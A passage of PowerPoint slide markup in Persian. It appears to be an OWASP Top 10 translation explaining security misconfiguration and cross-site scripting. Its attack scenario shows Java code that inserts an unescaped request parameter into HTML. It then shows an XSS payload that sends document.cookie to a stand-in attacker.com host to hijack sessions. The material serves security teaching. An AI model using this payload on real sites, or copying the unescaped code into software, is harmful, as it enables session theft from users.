                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>پیکربندی اشتباه امنیتی ممکن است در هر سطحی از یک برنامه شامل خدمات شبکه، پلت فرم، سرور وب، سرور برنامه، پایگاه داده، چارچوب ها، کد سفارشی و ماشین های مجازی، و</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> فضای </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>ذخیره‌سازی رخ دهد. اسکنرهای خودکار برای تشخیص پیکربندی‌های اشتباه، استفاده از حساب های پیش‌فرض،</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>خدمات غیرضروری، غیره مفید هستند.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>چنین نقصی اغلب دسترسی غیرمجاز به برخی از داده‌های سیستم یا عملکرد سیستم</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> را به </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>مهاجم می‌دهد. گاهی اوقات چنین نقصی باعث ایجاد یک سازش کامل سیستم می شود.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1100" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>تاثیر کسب و کار بستگی به نیازهای حفاظت از برنامه و داده ها دارد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نمونه‌ سناریو حمله</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو 1: برنامه بدون تایید یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، از داده های غیر قابل اعتماد در ساخت قطعه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>زیر استفاده می کند:</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B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>' type='TEXT'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>  value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>("CC") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مهاجم پارامتر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> را در مرورگر خود به صورت زیر تغییر می دهد :</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>  foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>این حمله باعث می شود شناسه نشست قربانی به وب سایت مهاجم ارسال شده و به مهاجم اجازه سرقت نشست فعلی کاربر را می دهد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نکته: مهاجمان می توانند از</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> برای جلوگیری از هر گونه دفاع خودکار </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> استفاده کنند. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربردی آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سه شکل از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>وجود دارد که معمولا مرورگرهای کاربران را هدف قرار می دهند:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> منعکس شده: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
